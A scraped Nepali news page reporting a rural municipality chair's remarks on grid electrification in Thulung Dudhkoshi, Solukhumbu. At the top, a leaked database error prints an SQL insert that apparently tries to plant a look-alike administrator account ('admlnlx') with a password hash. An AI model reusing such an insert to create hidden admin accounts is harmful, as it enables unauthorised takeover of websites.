WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlEWmNmKB8pvgKUcIUFDBHwZj3whjp0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:20:07', '', 'admlnlx', 'admlnlx')

उज्यालो थुलुङ दुधकोशी अभियान साकार हुँदै गएको अध्यक्ष राईको भनाई – Gaule Khabar

उज्यालो थुलुङ दुधकोशी अभियान साकार हुँदै गएको अध्यक्ष राईको भनाई

उज्यालो थुलुङ दुधकोशी अभियान साकार हुँदै गएको अध्यक्ष राईको भनाई

काठमाण्डौ । थुलुङ दुधकोशी गाउँपालिकाका अध्यक्ष असिम राईले उज्यालो थुलुङ दुधकोशी अभियान पूरा हुने चरणमा रहेको बताएका छन्।

सोलु करिडोर ग्रामीण विद्युतिकरण परियोजनाको ट्रान्सफर्मर चार्ज सकिएसङ्गै थुलुङ दुधकोशी गाउँपालिका (६ )मुक्लीमा शनिबार राष्ट्रिय प्रशासन लाईनको उद्घाटन कार्यक्रममा संक्षिप्त मन्तब्य व्यक्त गर्दै नेकपा माओवादी केन्द्र सोलुखुम्बु जिल्ला समन्वय समिति संयोजक समेत रहेका गाउँपालिका अध्यक्ष राईले सो कुरा बताएका हुन्।
गाउँपालिकाको वडा नं।१,२, ६ र ७ को घरघरमा राष्ट्रिय प्रशारणलाइन जोडिने बताउंदै अध्यक्ष राईले क्रमशः अन्य वडामा पनि बिस्तार गरिने जानकारी दिए।

राष्ट्रिय प्रशारण लाईन बिस्तारका लागि समन्वय र सहयोग गर्नुभएको भन्दै राईले सोलुखुम्बु जिल्लाका संघीय सांसद हेमकुमार राई (शुरविर) र नेपाल विद्युत प्राधिकरणका कार्यकारी निर्देशक कुलमान घिसिङका साथै फिल्डमा खटेर काम गर्ने कर्मचारी र अन्य स्थानीय कामदारलाई विशेष धन्यवाद समेत दिएका छन् ।

कार्यक्रममा थुलुङदुधकोशी गाउँपालिका वडा नं ७ का वडाध्यक्ष रामसंघर्ष किराँती र गाउँपालिकाका सामाजिक बिकास समिति संयोजक बुद्धिराज राई लगायत स्थानीय ब्यक्तिहरुको उपस्थिति रहेको थियो।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका